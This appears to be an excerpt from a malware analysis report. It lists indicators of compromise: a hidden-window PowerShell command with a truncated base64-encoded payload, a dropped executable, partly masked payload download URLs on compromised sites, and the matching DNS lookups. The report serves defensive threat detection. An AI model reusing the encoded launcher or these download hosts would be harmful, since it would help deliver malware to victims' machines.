Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAHUAcgB5AGEAYwB6AG8AcgA9ACcAagBlAGkAdABqAG8AbwBoAHMAaQBkAGcAZQBhAGYAYgB1AGMAaABjAGgAYQBvAHgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAdQBgAF...
- %HOMEPATH%\745.exe
- http://fl##00.com/wp-admin/oe1q7cr/
- http://www.fl##00.com/wp-admin/oe1q7cr/
- http://un###stion.com/components/w5dim/
- http://ac##nsk.ru/general/Ve/
- http://ha##.com.vn/wp-admin/m2s/
- DNS ASK fl##00.com
- DNS ASK un###stion.com
- DNS ASK ka###rang.com
- DNS ASK ac##nsk.ru
- DNS ASK ha##.com.vn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAHUAcgB5AGEAYwB6AG8AcgA9ACcAagBlAGkAdABqAG8AbwBoAHMAaQBkAGcAZQBhAGYAYgB1AGMAaABjAGgAYQBvAHgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAdQBgAF...' (with hidden window)